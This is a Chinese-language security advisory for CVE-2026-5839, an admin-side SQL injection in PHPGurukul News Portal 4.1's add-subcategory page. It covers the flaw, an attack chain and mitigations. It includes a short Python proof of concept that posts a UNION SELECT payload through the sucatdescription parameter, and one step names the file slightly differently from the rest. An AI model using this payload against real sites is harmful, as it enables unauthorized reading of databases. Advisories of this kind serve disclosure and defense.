CVE-2026-5839 CVSS 4.7 中危

CVE-2026-5839 PHPGurukul新闻门户SQL注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5839

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul News Portal Project

漏洞概述

PHPGurukul News Portal Project 4.1版本被披露存在一处SQL注入安全漏洞。该漏洞位于后台管理系统的`/admin/add-subcategory.php`文件中，主要原因是未对`sucatdescription`参数进行有效的安全过滤。攻击者需具备管理员权限，通过构造特定的恶意请求，即可远程触发该漏洞，进而窃取数据库敏感信息或篡改数据。

技术细节

该漏洞根源于PHPGurukul News Portal Project 4.1版本在开发过程中未能遵循安全编码规范。具体受影响的文件为`/admin/add-subcategory.php`，该脚本主要用于处理新闻子分类的添加与存储。在处理用户提交的`sucatdescription`参数时，应用程序直接将其拼接至SQL查询语句中，未进行任何形式的输入清洗或使用预编译技术。根据CVSS评分向量（AV:N/AC:L/PR:H/UI:N/S:U），攻击者必须首先拥有高权限（即管理员账户）才能访问该接口。一旦攻击者登录后台，便可在提交子分类描述时注入恶意的SQL代码。这种SQL盲注或联合查询攻击可能导致数据库中的敏感信息（如管理员密码哈希、用户个人资料等）被非法读取，严重威胁系统的机密性与完整性。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是PHPGurukul News Portal Project 4.1版本，并定位后台管理入口。

STEP 2

获取权限

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或凭据复用获取管理员账户密码。

STEP 3

漏洞利用

攻击者登录后台，访问/admin/add-subsubcategory.php页面，并在sucatdescription参数中注入恶意SQL语句。

STEP 4

数据窃取

应用程序执行恶意SQL查询，返回数据库敏感信息（如用户名、密码哈希等）给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/admin/add-subcategory.php"

# Attacker needs valid admin session cookies (PR:H requirement)
cookies = {
    "PHPSESSID": "admin_session_id_here",
    "auth_token": "valid_token_here"
}

# Payload to inject SQL via sucatdescription parameter
# Example: Attempting to extract database version
payload = {
    "categoryname": "Test",
    "sucatdescription": "Test' UNION SELECT 1, version(), 3, 4, 5-- -",
    "submit": "Submit"
}

try:
    response = requests.post(url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response for SQL output.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

PHPGurukul News Portal Project 4.1

防御指南

临时缓解措施

建议立即在WAF（Web应用防火墙）中部署针对SQL注入的防护规则，重点拦截对`/admin/add-subcategory.php`接口的异常请求。在代码修复前，应暂时禁用受影响的子分类添加功能，或通过代码修改对`sucatdescription`字段进行强制类型检查和字符串转义（如使用`mysqli_real_escape_string`），确保单引号等SQL元字符被正确处理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5839
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5839
3 Details https://www.cvedetails.com/cve/CVE-2026-5839/
4 VulDB https://vuldb.com/cve/CVE-2026-5839
5 Link https://github.com/f1rstb100d/CVE/issues/28
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/789912
8 Link https://vuldb.com/vuln/356295
9 Link https://vuldb.com/vuln/356295/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表